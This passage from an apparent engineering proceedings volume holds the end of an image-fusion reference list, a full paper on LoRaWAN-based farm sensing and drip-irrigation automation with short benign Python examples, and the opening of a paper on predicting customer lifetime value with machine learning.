of multifocus images. IEEE Transactions on Signal Processing, 15, 65–68.
32. Wan, T., Canagarajah, N., & Achim, A. (2009). Segmentation-driven image fusion based on
alpha-stable modeling of wavelet coefficients. IEEE Transactions Multimedia, 11, 624–633.
33. Liu, Y., Liu, S., & Wang, Z. (2015). Multi-focus image fusion with dense SIFT. Information
Fusion, 23, 139–155.
34. Nejati, M., Samavi, S., & Shirani, S. (2015). Multi-focus image fusion using dictionary-based
sparse representation. Information Fusion, 25, 72–84.
35. Liu, Z., Chai, Y., Yin, H., Zhou, J., & Zhu, Z. (2017). A novel multi-focus image fusion approach
based on image decomposition. Information Fusion, 35, 102–116.
36. Cao, L., Jin, L., Tao, H., Li, G., Zhuang, Z., & Zhang, Y. (2015). Multi-focus image fusion
based on spatial frequency in discrete cosine transform domain. IEEE Transactions on Signal
Processing, 22, 220–224.
37. He, K., Sun, J., & Tang, X. (2013). Guided image filtering. IEEE Transactions on Pattern
Analysis and Machine Intelligence, 35, 1397–1409.
38. Wright, J., Ma, Y., Mairal, J., Sapiro, G., Huang, T. S., & Yan, S. (2010). Sparse representation
for computer vision and pattern recognition. Proceedings of the IEEE, 98, 1031–1044.
39. Tropp, J. A. (2004). Greed is good: Algorithmic results for sparse approximation. IEEE
Transactions on Information Theory, 50, 2231–2242.
40. Qiu, X., Li, M., Zhang, L., & Yuan, X. (2019). Guided filter-based multi-focus image fusion
through focus region detection. Signal Processing Image Communication, 72, 35–46.
41. Li, S., Kang, X., & Hu, J. (2013). Image fusion with guided filtering. IEEE Transactions on
Image Processing, 22, 2864–2875.
42. Li, S., Kang, X., Hu, J., & Yang, B. (2013). Image matting for fusion of multi-focus images in
dynamic scenes. Information Fusion, 14, 147–162.
43. Wang, J., & Cohen, M. F. (2007). Image and video matting: A survey; foundations and trends
in computer graphics and vision (Vol. 3, pp. 97–175). Now Publishers Inc., Delft.
44. Shreyamsha Kumar, B. K. (2015). Image fusion based on pixel significance using cross bilateral
filter. Signal Image Video Processing, 9, 1193–1204.
45. Bai, X., Zhang, Y., Zhou, F., & Xue, B. (2015). Quadtree-based multi-focus image fusion using
a weighted focus-measure. Information Fusion, 22, 105–118.
46. Guo, D., Yan, J., & Qu, X. (2015). High quality multi-focus image fusion using self-similarity
and depth information. Optics Communication, 338, 138–144.
47. Qu, X., Hu, C., Yan, J. (2008) Image fusion algorithm based on orientation information moti-
vated pulse coupled neural networks. In Proceedings of the 7th World Congress on Intelligent
Control and Automation (pp. 2437–2441)
48. Qu, X.-B., Yan, J.-W., Xiao, H.-Z., & Zhu, Z.-Q. (2008). Image fusion algorithm based on spatial
frequency-motivated pulse coupled neural networks in nonsubsampled contourlet transform
domain. Acta Automation Sinica, 34, 1508–1514.
49. Zhang, Y., Bai, X., & Wang, T. (2017). Boundary finding based multi-focus image fusion
through multi-scale morphological focus-measure. Information Fusion, 35, 81–101.
50. Zhou, Z., Li, S., & Wang, B. (2014). Multi-scale weighted gradient-based fusion for multi-focus
images. Information Fusion, 20, 60–72.
51. Paul, S., Sevcenco, I. S., & Agathoklis, P. (2016). Multi-exposure and multi-focus image fusion
in gradient domain. Journal Circuits System Computer, 25, 1650123.
52. Farid, M. S., Mahmood, A., & Al-Maadeed, S. A. (2019). Multi-focus image fusion using
content adaptive blurring. Information Fusion, 45, 96–112.
53. Tao, Q., & Veldhuis, R. (2009). Threshold-optimized decision-level fusion and its application
to biometrics. Pattern Recognition, 42, 823–836.
54. Durrant-Whyte, H., & Henderson, T. C. (2008). Multisensor data fusion. Springer handbook
of robotics (pp. 585–610). Springer.
55. Varshney, P. K. (2000). Multisensor data fusion. In R. Logananthara, G. Palm, & M. Ali (Eds.), Intelligent problem solving. Methodologies and approaches (pp. 1–3). Springer.
56. Abhyankar, M., Khaparde, A., & Deshmukh, V. (2016). Spatial domain decision based image
fusion using superimposition. In Proceedings of the 2016 IEEE/ACIS 15th International
Conference on Computer and Information Science (ICIS) (pp. 1–6).
57. Liu, Y., & Wang, Z. (2015). Dense SIFT for ghost-free multi-exposure fusion. Journal of Visual
Communication and Image Representation, 31, 208–224.
58. Naidu, V., & Elias, B. (2013). A novel image fusion technique using DCT based Laplacian
Pyramid. International Journal of Invention Engineering Science (IJIES), 1, 1–9.
59. Tian, J., & Chen, L. (2012). Adaptive multi-focus image fusion using a wavelet-based statistical
sharpness measure. IEEE Transactions on Signal Processing, 92, 2137–2146.
60. Nunez, J. (1999). Multiresolution-based image fusion with additive wavelet decomposition.
IEEE Transactions on Geoscience and Remote Sensing, 37, 1204–1211.
61. Li, S., Kwok, J., & Wang, Y. (2001). Combination of images with diverse focuses using the
spatial frequency. Information Fusion, 2, 169–176.
62. Tian, J., Chen, L. (2010). Multi-focus image fusion using wavelet-domain statistics. In
Proceedings of the 2010 IEEE International Conference on Image Processing (pp. 1205–1208).
63. Liu, Y., Liu, S., & Wang, Z. (2015). A general framework for image fusion based on multi-scale
transform and sparse representation. Information Fusion, 24, 147–164.
64. Li, S., & Yang, B. (2008). Multifocus image fusion using region segmentation and spatial
frequency. Image and Vision Computing, 26, 971–979.
65. Li, S., Yang, B., & Hu, J. (2011). Performance comparison of different multi-resolution
transforms for image fusion. Information Fusion, 12, 74–84.
66. Li, S., & Yang, B. (2008). Multifocus image fusion by combining curvelet and wavelet
transform. Pattern Recognition Letter, 29, 1295–1301.
67. Haghighat, M. B. A., Aghagolzadeh, A., & Seyedarabi, H. (2011). Multi-focus image fusion for
visual sensor networks in DCT domain. Computers and Electrical Engineering, 37, 789–797.
68. Martorell, O., Sbert, C., & Buades, A. (2019). Ghosting-free DCT based multi-exposure image
fusion. Signal Processing Image Communication, 78, 409–425.
69. Kingsbury, N. (2000) The dual-tree complex wavelet transform with improved orthogo-
nality and symmetry properties. In Proceedings of IEEE International Conference on Image
Processing (ICIP) (pp. 375–378).
70. Mitianoudis, N., & Stathaki, T. (2007). Pixel-based and region-based image fusion schemes
using ICA bases. Information Fusion, 8(2), 131–142.
71. Hossny, M., Nahavandi, S., & Creighton, D. (2008). Comments on information measure for
performance of image fusion. Electronics Letters, 44(18), 1066–1067.
72. Wang, Q., Shen, Y., & Zhang, J. (2005). A nonlinear correlation measure for multivariable data
set. Physica D: Nonlinear Phenomena, 200(3–4), 287–295.
73. Xydeas, C. S., & Petrovic, V. S. (2000). Objective image fusion performance measure.
Electronics Letters, 36(4), 308–309.
74. Zhao, J., Laganiere, R., & Liu, Z. (2007). Performance assessment of combinative pixel-level
image fusion based on an absolute feature measurement. International Journal of Innovative
Computing, Information and Control, 6(3), 1433–1447.
75. Lytro Multi-focus Image Dataset. https://www.researchgate.net/publication/291522937_Lytro_Multi-focus_Image_Dataset. Accessed September 2020.
IoT-Based Agricultural Automation
Using LoRaWAN

Jaisal Chauhan, K. Agathiyan, and Neha Arora

Abstract Automation is the strategic placement of sensors, and the system responds
to various sensor readings in various situations. The practice of automation continues
to be widely adopted and integrated in health care, assembly-line factories, and other major industries. However, in agriculture, most of the work is manual and effort intensive. The farmers also do not have access to recommendations for changing their method of operation to make the farming process cost-effective and more efficient. The proposed system consists of edge devices and a central node. The edge
devices have an interfaced temperature and humidity sensor (DHT11) and moisture
sensor. The data collected by these sensors in all the edge devices is transmitted to the
central node via a long-range (LoRa) gateway. The LoRa wireless communication
technology is selected as it communicates in the 433 MHz ISM band which is not
monetarily charged by network providers and thus reduces data costs apart from
providing long-range communication capability in remote rural areas without much
network connectivity. The module used is the Ai-Thinker RA-02 LoRa module. The
central node transmits this collected data to a cloud-based database. AWS has been
used for the purposes of the current work. The system provides task automation such
as drip irrigation, and stored data can be run through an analytics engine to provide
farmers with insights regarding their practices and recommendations which increase
productivity and reduce operational costs.

Keywords LoRa module · Sensors · IoT · Agriculture · Temperature · Humidity

J. Chauhan (B) · K. Agathiyan · N. Arora


ASET, Amity University, Noida, India
N. Arora
e-mail: narora2@amity.edu


1 Introduction

Water is one of the important factors for the survival and development of human
beings. Thus, water plays an important role in the process of agriculture. It also
affects the rate of economic development of the nation.
According to Patel [1], the availability of water for irrigation will be comparatively less in the
future, i.e., by the year 2025, as projected by the International Water Management
Institute (IWMI). So, in order to conserve water for agriculture in the future, new
technologies are required to be implemented on the field. Currently, Internet of Things
(IoT) is emerging in almost all sectors. It not only covers agriculture but also a vast
region of sectors like transport, communication, industries, health care and many
more [2–5]. These days, sensors can be placed at the desired location or even worn
around the body to collect the input data [6]. There are use cases where sensors are
in moving state to collect data at different locations due to vast range of features
provided by wireless sensor nodes [7].
Current automated systems do include wireless communication between
connected devices and their interfaced sensors. However, this communication, as
it used to happen within infrastructure (buildings, factories, etc.), has been executed
mostly via 3G/4G communication technology that provides fast connectivity within
a closed structural infrastructure. However, since the system for agricultural automa-
tion is to operate outside in field, there are certain custom requirements accompa-
nying its implementation, such as the capability to function in areas with low network
coverage, transmit data over large distances in the open farmland and reduce costs,
as the sheer size of the farmland necessitates use of many units and cost per unit
should be low to make the overall system monetarily feasible to be implemented and
used.
Table 1 illustrates a comparison between various wireless data communication
technologies. As it is evident from the table, LoRa provides tangible benefits across
the board in terms of its low power consumption (which translates to lower operating

Table 1 Comparison of mainstream wireless communication technologies


Wireless standard Power Transmission range (typical) Data rates
Bluetooth Medium 1–100 m 1–3 Mbps
Bluetooth LE Lower >100 m 125 kbps–2 Mbps
LoRaWAN Low 10 km 0.3–50 kbps
NB-IoT Low <35 km 20 kbps–Mbps
NFC Low <10 cm 106–424 kbps
Sigfox Low 3–50 km 100–600 kbps
6LoWPAN Low 100 m 0–250 kbps
802.11/Wi-Fi Medium 100 m to several km (with boosters) 10–100 + Mbps
802.15/Zigbee Low 10–100 m 20–250 kbps
Z-Wave Low 15–150 m 9.6–40 kbps

costs and bills associated with system runtime), comparatively low costs for system
setup and maintenance, longevity even when working via battery (due to its low
power consumption), highest possible operating range which extends up to several
kilometers theoretically. In actual practice, due to disturbances created by physical
obstructions such as trees, sheds and other similar infrastructure of an obstructive
nature, the range is tuned approximately to a kilometer. However, a similar impact is
observed in the range of other wireless technologies, and they undergo range reduc-
tion, ensuring that LoRa retains its position and provides for highest communicative
range for wireless communication. The other benefits in terms of no monetary charges
incurred for data transfer due to LoRa operating in ISM range and its independence
from connectivity requirements have been explored previously.
In the subsequent sections, the relevant aspects associated with the proposed
system design and implementation have been outlined. Section 2 consists of the liter-
ature review, and Sect. 3 presents the detailed design-related aspects of the proposed
system. The implementation and working of the system is described in Sects. 4 and
5 concludes the work with future work.

2 Literature Review

LoRa communication technology was developed by Semtech™ and works on
“spread spectrum” modulation, where frequency and time are the two spreading factors of the data, which
increase range as well as provide robustness to the system. The receiver sensitivity
ranges from −137 dBm at 868 MHz to −148 dBm at 433 MHz. In long-range
communication, the throughput and range of the module depend on three parameters:
CR (code rate), SF (spreading factor) and BW (bandwidth).
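To make the dependence on these three parameters concrete, the sketch below evaluates the commonly cited LoRa bit-rate relationship Rb = SF * (4 / (4 + CR)) * (BW / 2^SF); it is an illustration only, and the parameter values used are assumed examples rather than figures taken from this paper.

import math  # not strictly needed; kept for clarity that only standard Python is used

def lora_bit_rate(sf: int, bw_hz: float, cr: int) -> float:
    """Approximate LoRa raw bit rate in bits per second.

    sf    : spreading factor (7..12)
    bw_hz : channel bandwidth in Hz (e.g. 125e3)
    cr    : coding-rate index (1..4, i.e. 4/5 .. 4/8)
    """
    return sf * (4.0 / (4 + cr)) * (bw_hz / 2 ** sf)

# Example: higher spreading factors give longer range but much lower data rates.
for sf in range(7, 13):
    print(f"SF{sf}: {lora_bit_rate(sf, 125e3, 1):7.1f} bps")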
Danco Davcev, Kosta Mitreski and Nikola Koteli developed a system for long-
range data communication from the sensor nodes to the cloud services while
consuming less power using LoRaWAN technology. Their system of cloud services
was highly scalable and utilized data stream for analytics purposes and was
implemented in grape farms [8].
Jaiganesh, Gunaseelan and Ellappan applied a cloud-based application implemented
for agriculture. It used an agro-cloud, which improved agricultural production, and
the accessibility of information was identified. The communication was made
simpler and faster [9].
Chandra Sukanya Nandyala and Haeng-Kon Kim worked on Green IoT and devel-
oped Green IoT Agriculture and Healthcare Application (GAHA) using a sensor-
cloud integration model. It targeted a sustainable smart world, by reducing the energy
consumption of IoT [10]. Tse-Chuan Hsu et al designed a creative IoT agriculture
platform for cloud and fog computing, proposing a decentralized Internet of Things
data analysis model to reduce costs of network transmission. The experimental results
were verified for the same [11].
Mahammad Shareef Mekala and Viswanathan P enhanced the understanding
of the different technologies being used to build sustainable smart agriculture

by surveying some typical applications of agriculture IoT sensor monitoring


network technologies using cloud computing [12]. Nikesh Gondchawar and R. S.
Kawitkar used smart GPS-based remote-controlled robots to perform tasks like
weeding, spraying, moisture sensing, bird and animal scaring, keeping vigilance
and modernized the current traditional methods of agriculture [13].
D. Vasisht et al. enabled seamless data collection from IoT nodes by using an
end-to-end IoT platform such as FarmBeats. Their system design also accounted for
weather-related power and Internet outages [14]. S. R. Prathibha, Anupama Hongal
and M. P. Jyothi used IoT and automation for smart agriculture and monitored temper-
ature and humidity in agricultural field using CC3200 single chip [15]. J Muang-
prathub et al. proposed a scheme to optimize crop watering by developing wireless
sensor networks, designing and developing the control system between node sensors
in the field, the data management via smartphone and web application.
After reviewing some of the research work, to the best of the authors' knowledge, it
was observed that existing work focused primarily on data acquisition and transfer,
leaving it to the farmers to independently react to the data, by switching on the motor
for irrigation, for example. However, the proposed work accounts for some degree
of automated decision-making, wherein automatic drip irrigation is carried out when
soil moisture drops below a certain minimum threshold.

3 Designing of the System

The main components of the proposed device are as follows:

3.1 LoRa by Semtech Inc

Semtech's LoRa is classified as a short-range device (SRD) technology due to its electromagnetic
transmission in the sub-GHz band. In India, for example, Semtech's LoRa uses the
433 MHz ISM band for radio transmission. Transmitters in this band are constrained
to a 2% duty cycle, which amounts to about 72 s of air time per hour in a normal scenario.
In practice, only about half of this duty limit is needed: a duty cycle of about 1% is large
enough for the devices to communicate and to comply with the application's needs.
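A small worked example of the duty-cycle arithmetic above; the per-message air time used in the last line is an assumed figure for illustration, not a value from the paper.

SECONDS_PER_HOUR = 3600

def airtime_budget(duty_cycle: float) -> float:
    """Allowed transmission time per hour (in seconds) for a given duty cycle."""
    return duty_cycle * SECONDS_PER_HOUR

def max_messages_per_hour(duty_cycle: float, msg_airtime_s: float) -> int:
    """How many messages of a given air time fit into the hourly budget."""
    return int(airtime_budget(duty_cycle) // msg_airtime_s)

print(airtime_budget(0.02))               # 72.0 s of air time per hour at a 2% duty cycle
print(airtime_budget(0.01))               # 36.0 s per hour at 1%
print(max_messages_per_hour(0.01, 0.06))  # e.g. 600 messages of an assumed 60 ms air time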

3.2 AI-Thinker RA-02 Module

For the current work, the Ai-Thinker RA-02 LoRa module has been used as it is
suitable for long-distance communications. The biggest benefit of this module is its
capability of performing all the required functionalities, at a low cost. LoRa modules

can be very expensive, depending on the specific module selected and its capabilities.
Certain modules may range above INR 30,000 but it is impractical to utilize these
due to monetary constraints, especially when the farmland may require many edge
devices, each outfitted with a LoRa module. Moreover, our target base, the farmers,
will not opt into the system if the associated costs are prohibitively large. Thus, a
cost-effective alternative was provided in the form of the RA-02 LoRa module.
Moreover, the most important consideration in the specifications is the frequency
range. The module provides low-power, long-range communication capabilities in
the 410–525 MHz frequency range. This is important because the ISM band in India
is 433 MHz. Communication is preferred within this range to utilize the benefit of ISM
band communication, which incurs no monetary cost.
The product specifications of the RA-02 LoRa module are provided in Table 2,
and Table 3 depicts the reception sensitivity of the Ai-Thinker RA-02 radio module. Two

Table 2 Product specifications of the RA-02 LoRa module


Product specifications
Module model: Ra-02
Package: SMD-16
Size: 17 × 16 × (3.2 ± 0.1) mm
Interface: SPI
Programmable bit rate: up to 300 kbps
Frequency range: 410–525 MHz
Antenna: IPEX
Max transmit power: 18 ± 1 dBm
Power (typical values): 433 MHz: TX 93 mA, RX 12.15 mA, Standby 1.6 mA; 470 MHz: TX 97 mA, RX 12.15 mA, Standby 1.5 mA
Power supply: 2.5–3.7 V, typical 3.3 V
Operating temperature: −30 °C to 85 °C
Storage environment: −40 °C to 90 °C, <90% RH
Weight: 0.45 g

Table 3 Reception sensitivity specifications of RA-02 LoRa module with different frequencies
Frequency Spread factor SNR Sensitivity (dBm)
433 MHz 7 −7 −125
433 MHz 10 −15 −134
433 MHz 12 −20 −141
470 MHz 7 −7 −126
470 MHz 10 −15 −135
470 MHz 12 −20 −141

working frequencies, 433 MHz and 470 MHz, have been compared in terms of the
spread factor, signal to noise ratio (SNR) and sensitivity.

4 Implementation and Working

The LoRa gateway acts as the central hub in the network. Many edge devices of
the network with their interfaced sensors collect data and collectively transmit the
same using LoRaWAN to the gateway. The gateway collects data from multiple edge
devices. This data can be transferred to a cloud storage facility if Internet connectivity
exists or can be accessed directly via the gateway without Internet connection access.
LoRa networks can include thousands of connected edge devices with many gateways
to cover enormous area. However, considering the practical implementation of this
system in agriculture in South–East Asian countries, such extensive capabilities are
not required. The farm area in these countries is much smaller than the farms in
developed countries (Farms in the US can span many thousands of acres of land
while farms in India have an average land area of merely two acres per farmer).
Thus, in the proposed system, a single gateway connected to multiple edge devices
has been used. The LoRa gateway of the current work could be classified as “single
connection” as it is built around the SX1276/78 IC which acts as the LoRa module.
There are many SX1276/78 radio modules available, and the SX1278-based Ai-Thinker
RA-02 LoRa module is used for the current work.
Figure 1 describes the connections for the LoRa gateway by using components
which are easily available and can be procured either online or through hardware
and electronic vendors. This makes the gateway easy to assemble with seamless
part replacement and reduces the costs associated with component procurement,
replacement and assembly. The software stack is entirely open source: (a) the
Raspberry Pi runs an ordinary Raspbian distribution, (b) the long-range communication
library is based on the SX1272 library and (c) the program for the LoRa gateway is kept as
simple as reasonably possible. The gateway was tested in various conditions
with a DHT11 sensor to monitor the humidity and temperature levels. Tests show
that the low-cost gateway can be installed in outdoor conditions with the appropriate
waterproof casing.

Fig. 1 Connection diagram for RPi and LoRa module

Gateway to Cloud (in the presence of internet connection) In the presence of


Internet connection, the gateway can transfer its collected sensor data to a cloud
storage facility. There are multiple options for online cloud-based data storage such
as Dynamo DB, Mongo DB and Firebase. Once uploaded, this data can be easily
accessed by the farmers by accessing the specific online account containing the stored
information, through the provided user credentials. After the data transfer is done, data
analytics and other higher-order processing can be carried out. This happens beyond the
gateway stage and requires Internet connectivity; once connected, the collected data can
be processed.
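As a rough sketch of this step, the snippet below shows how the gateway could push one decoded reading to a DynamoDB table using boto3. The table name, key schema and field names are assumptions for illustration; the paper does not specify them.

import time
import boto3

dynamodb = boto3.resource("dynamodb", region_name="ap-south-1")
table = dynamodb.Table("farm_sensor_data")   # hypothetical table name

def upload_reading(node_id: str, temperature: float, humidity: float, moisture: float) -> None:
    """Store one decoded edge-device reading with a timestamp (assumed key schema)."""
    table.put_item(
        Item={
            "node_id": node_id,                 # assumed partition key
            "timestamp": int(time.time()),      # assumed sort key
            "temperature_c": str(temperature),  # numbers stored as strings for simplicity
            "humidity_pct": str(humidity),
            "soil_moisture_pct": str(moisture),
        }
    )

upload_reading("edge-01", 31.5, 42.0, 27.3)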
Gateway in the Absence of Internet Connectivity In the absence of Internet connec-
tivity, the received data cannot be stored in a cloud-based storage facility. However,
it is stored in the internal memory of the gateway and can still be accessed directly
through it, provided a keyboard and monitor are attached to it. It should be
noted that there is limited internal storage in the gateway (the Raspberry Pi has 2 GB
storage), and if the Internet connection is not available for prolonged durations,
stored information will build up, and this will adversely affect the gateway perfor-
mance efficiency and drain battery further. In extreme cases, it might even overload
the gateway storage capacity. If the information is being accessed directly from the
gateway, another alternative to using keyboards and monitors is to attach a Bluetooth
shield and transfer the data from the gateway to a local device via Bluetooth.
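A minimal sketch of such offline buffering is given below, using the Python sqlite3 module on the gateway; the local database path is an assumption, and upload_reading() refers to the hypothetical cloud-upload helper sketched earlier.

import sqlite3

conn = sqlite3.connect("/home/pi/sensor_buffer.db")   # assumed local path on the gateway
conn.execute(
    "CREATE TABLE IF NOT EXISTS readings "
    "(node_id TEXT, ts INTEGER, temperature REAL, humidity REAL, moisture REAL)"
)

def buffer_reading(node_id, ts, temperature, humidity, moisture):
    """Append one reading to the local buffer while the gateway is offline."""
    conn.execute("INSERT INTO readings VALUES (?, ?, ?, ?, ?)",
                 (node_id, ts, temperature, humidity, moisture))
    conn.commit()

def flush_buffer(upload_reading):
    """Push all buffered rows to the cloud and clear the local table once online."""
    rows = conn.execute(
        "SELECT node_id, ts, temperature, humidity, moisture FROM readings"
    ).fetchall()
    for node_id, ts, temperature, humidity, moisture in rows:
        upload_reading(node_id, temperature, humidity, moisture)
    conn.execute("DELETE FROM readings")
    conn.commit()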

5 Results and Discussion

Figure 2 shows interfacing between the edge devices and the LoRa module. Two
Arduino boards are used, both acting as edge devices with interfaced sensors. The
edge devices each have an interfaced LoRa module and can engage in data transfer

Fig. 2 Two edge clients with interfaced LoRa modules

from one to another. Both the edge devices connect to a common RPi-based central
node which puts their transmitted data into a cloud database. For the current work
specifically, a Dynamo DB service offered by Amazon Web Services (AWS) has
been used. Since edge devices do not require much computational power and are
performing comparatively simple operation such as receiving interfaced sensor inputs
and transmitting it via LoRa module at periodic intervals, Arduino UNO boards were
chosen for edge devices considering its lower cost and appropriate computational
power.
Figure 3 depicts the Raspberry Pi with an interfaced DHT11 sensor for sensor cali-
bration and testing. Once the DHT11 was calibrated, it was able to detect the ambient
temperature, the readings of which are shown in Fig. 4. Similarly, the moisture sensor
was also interfaced, calibrated and tested before being integrated into the edge device.
The readings given by the Raspberry Pi gateway after reception from edge devices,
which have been transferred to the Dynamo DB created on the AWS Cloud Account,
are depicted in Fig. 4a, and Fig. 4b depicts the graphical representation of the soil moisture
readings (which can be obtained from Dynamo DB) on AWS. The results indicate
that the system is robust and functions appropriately even if drastic changes in the
system environment take place. In the case of the soil moisture graph, when the soil
was intentionally flooded with water, the corresponding response was recorded in the
graph at 11:06 a.m., one minute after the spike was induced. Then, on removal of the
sensor from that environment, the readings again reflected the change within a minute
of the action being performed. Thus, it is
expected that the system will function appropriately when deployed on large scale
in real fields and give data that is updated at high speed capable of reflecting any
changes that occur in the environment of the crops in real time. The proposed real-
time sensing capability and automated drip irrigation are expected to help the farmers
by reducing resource (water and electricity) wastage and optimizing operations by
using drip irrigation to conserve power as well as water.
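The threshold-based drip-irrigation decision described above could look roughly like the following sketch, assuming the valve or pump relay is driven from a Raspberry Pi GPIO pin; the pin number and the 30% moisture threshold are placeholders, not values specified in the paper.

import RPi.GPIO as GPIO

VALVE_PIN = 17             # hypothetical BCM pin wired to the pump/valve relay
MOISTURE_THRESHOLD = 30.0  # assumed minimum soil-moisture percentage

GPIO.setmode(GPIO.BCM)
GPIO.setup(VALVE_PIN, GPIO.OUT, initial=GPIO.LOW)

def actuate_irrigation(soil_moisture_pct: float) -> None:
    """Open the drip valve when soil moisture falls below the threshold, close it otherwise."""
    if soil_moisture_pct < MOISTURE_THRESHOLD:
        GPIO.output(VALVE_PIN, GPIO.HIGH)   # start drip irrigation
    else:
        GPIO.output(VALVE_PIN, GPIO.LOW)    # stop irrigation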

Fig. 3 Raspberry Pi with interfaced DHT11 sensor for calibration and testing

Fig. 4 a Temperature readings transferred from gateway to Dynamo DB. b Soil moisture readings
graph

6 Conclusion

The research in the current work addresses several important issues that need to be
considered: (a) long-range communication for rural access, (b) cost of equipment
and administration and (c) limiting reliance on restrictive frameworks while providing
local connection models. The proposed scheme addresses the above-mentioned issues.
Targeted at small to medium size deployment situations, the platform additionally
allows quick deployment and customization by third parties. The working of the device and
its connection with different cloud platforms has been presented in the paper; examples
include Dropbox™, Firebase™, ThingSpeak™, freeboard™, etc. Here, the low-cost
gateway uses Dynamo DB and a web server to show the received data in graphs. As a
result, the design of the low-cost LoRa gateway and end devices has been completed,
with some modification in the libraries as per the chipset used. The gateway has also
been tested in various conditions with a DHT11 sensor.

7 Future Work

The creation of an Android or iOS application would be extremely beneficial and can
be undertaken for the future research work. This application will enable farmers to
access an app through their mobile phone and access data related to temperature in
the farm, the value of moisture level in the soil and humidity readings. This would
also give the benefit of increased accessibility and mobility to the farmers.
Moreover, while the ISM band in many developed countries is in the 800 MHz
range, it is 433 MHz in India. Thus, if an all-purpose LoRa module that can operate in
both frequencies can be developed, it would be very useful because it would eliminate
the need for separate codes for the module to transmit over separate frequencies.

References

1. Patel, P. (2015). Irrigation problems and their solutions in agriculture. International Journal
of Research in all Subjects in Multi Languages [Subject Economics] (IJRSML) 3(2) ISSN:
2321–2853.
2. Atzori, L., Iera, A., & Morabito, G. (2010). The internet of things: A survey. Computer
Network 54(15), 2787–2805; International Journal of Smart Home 10(4) (2016) Copyright ©
2016 SERSC 299; DOI: https://doi.org/10.24897/acn.64.68.187.
3. Perera, C., Liu, C. H., Jayawardena, S., & Chen, M. (2014). A survey on Internet of Things
from industrial market perspective. IEEE Access, 2, 1660–1679. https://doi.org/10.1109/ACC
ESS.2015.2389854
4. Da Xu, L., He, W., & Li, S. (2014). Internet of things in industries: A survey. IEEE Transaction
Industrial Information, 10(4), 2233–2243. https://doi.org/10.1109/TII.2014.2300753
5. Al-Fuqaha, A., Guizani, M., Mohammadi, M., Aledhari, M., & Ayyash, M. (2015). Internet
of things: A survey on enabling technologies, protocols, and applications. Communications
Surveys & Tutorials, IEEE, 17(4), 2347–2376. https://doi.org/10.1109/COMST.2015.2444095
6. Neumann, P., Montavont, J., & Noël, T. (2016). Indoor deployment of low-power wide area
networks (LPWAN): A LoRaWAN case study. In Proceedings of the IEEE 12th International
Conference on Wireless and Mobile Computing, Networking and Communications (WiMob)
(pp. 1–8). https://doi.org/10.1109/WiMOB.2016.7763213.
7. Terrassona, G., Brianda, R., Basrourb, S., & Arrijuriaa, O. (2009). Energy model for the design
of ultra-low power nodes for wireless sensor networks. Procedia Chem 1, 1195–1198; Davcev,
D, Mitreski, K., & Koteli, N. (2018) IoT agriculture system based on LoRaWAN, In 14th IEEE
International Workshop on Factory Communication System (WFCS). https://doi.org/10.1109/
WFCS.2018.8402368.
8. Gunaseelan, J., & Ellappan (2017). IOT agriculture to improve food and farming technology.
In 2017 Conference on Emerging Devices and Smart Systems (ICEDSS). https://doi.org/10.
1109/ICEDSS.2017.8073690.
9. Nandyala, C. S., & Kim, H. K. (2016). Green IoT agriculture and health application. Interna-
tional Journal of Smart Home, 10(4), 289–300. http://dx.doi.org/https://doi.org/10.14257/ijsh.
2016.10.4.26.
10. Hsu, T. C., Yang, H., Chung, Y. C., & Hsu, C. H. (2018). A Creative IOT agriculture platform
for cloud fog computing. Sustainable Computing: Informatics and Systems, 100285. https://
doi.org/10.1016/j.suscom.2018.10.006.
11. Mekala, M. S., & Viswanathan, P. (2017) A survey: Smart agriculture IoT with cloud
computing. In 2017 International Conference on Microelectronic Devices, Circuits and Systems
(ICMDCS). https://doi.org/10.1109/ICMDCS.2017.8211551.
12. Gondchawar, N., & Kawitkar, R. S. (2016). IoT based smart agriculture. International Journal
of Advanced Research in Computer and Communication Engineering, 5(6). https://doi.org/10.
17148/IJARCCE.2016.56188.
13. Vasisht, D., Kapetanovic, Z., Won, J. H., Jin, X., Chandra, R., Kapoor, A., Sinha, S. N., &
Sudarshan, M. (2017). Sean Stratman; FarmBeats: An IoT Platform for Data-Driven Agricul-
ture. In 14th USENIX Symposium on Networked Systems Design and Implementation (NSDI
’17). Boston, MA, USA; ISBN 978-1-931971-37-9. https://www.usenix.org/conference/nsd
i17/technical-sessions/presentation/vasisht.
14. Prathibha, S. R., Hongal, A., & Jyothi, M. P. (2017). IOT based monitoring system in smart
agriculture. https://doi.org/10.1109/ICRAECT.2017.52.
15. Muangprathub, J., Boonnam, N., Kajornkasirat, S., Lekbangpong, N., Wanichsombat, A., &
Nillaor, P. (2018). IoT and agriculture data analysis for smart farm. j.compag.
Prediction of Customer Lifetime Value
Using Machine Learning

Kandula Balagangadhar Reddy, Debabrata Swain, Samiksha Shukla,


and Lija Jacob

Abstract The idea of viewing customers as resources that ought to be overseen


and whose worth ought to be estimated is currently acknowledged and perceived
by scholastics and professionals. This attention to client relationship management
makes it critical to comprehend customer lifetime value (CLV) in light of the fact
that CLV models are a productive and viable approach to assess an association’s
relationship with its clients. Appraisal of CLV is particularly significant for firms in
executing client situated administrations. In this paper, we give a basic audit of the
writing on the advancement cycle and uses of CLV and also discussed the predictions
of the CLV. The performance of the system is evaluated using mean absolute error
(MAE). The system has obtained the customer lifetime value with the mean absolute
error of 1.23%.

Keywords Customer lifetime value · Customer segmentation · Predictive model

1 Introduction

Worldwide e-commerce transactions generate $29.267 trillion, including $25.516
trillion for business-to-business (B2B) transactions and $3.851 trillion for business-
to-consumer (B2C) sales. Amazon.com accounts for most of the growth in online
business, selling practically 500 million SKUs in the USA.
Since then, e-commerce has progressed to make things easier to discover and purchase
through online retailers and marketplaces. Independent freelancers, small businesses,
and large enterprises have all benefitted from e-commerce, which enables them to sell
their products and services at a scale that was not feasible with traditional offline retail.
Worldwide retail e-commerce sales are projected to reach $27 trillion by 2020.
Customer lifetime value (CLV) is one of the key metrics to be tracked as part
of a customer experience program. CLV is an estimate of how valuable

K. B. Reddy (B) · D. Swain · S. Shukla · L. Jacob


CHRIST (Deemed To Be University), Lavasa, Pune, India


a customer is to the organization over an unbounded time horizon, rather than just
their first purchase. This estimate helps in understanding a reasonable cost of
acquisition for every customer.
We are living in a customer-centric market, so it is very important to know a
customer's lifetime value (CLV). The better a company understands CLV, the
better it can create strategies to retain customers. Finding the customer lifetime value
therefore helps a business concentrate its activities around its most “profitable”
customers.
Machine learning algorithms are implemented in this system. Prediction of
customer lifetime value is a regression problem. The dataset contains labeled data, and our
goal is to predict customer lifetime value based on labeled customer transaction
data. Therefore, supervised algorithms are used to train on the dataset and predict the
outcome. The model considered for this work is the beta geometric/negative binomial
distribution (BG/NBD) model. Knowing in advance whether a customer is valuable or not
helps product-selling companies to build their business around valuable customers. In
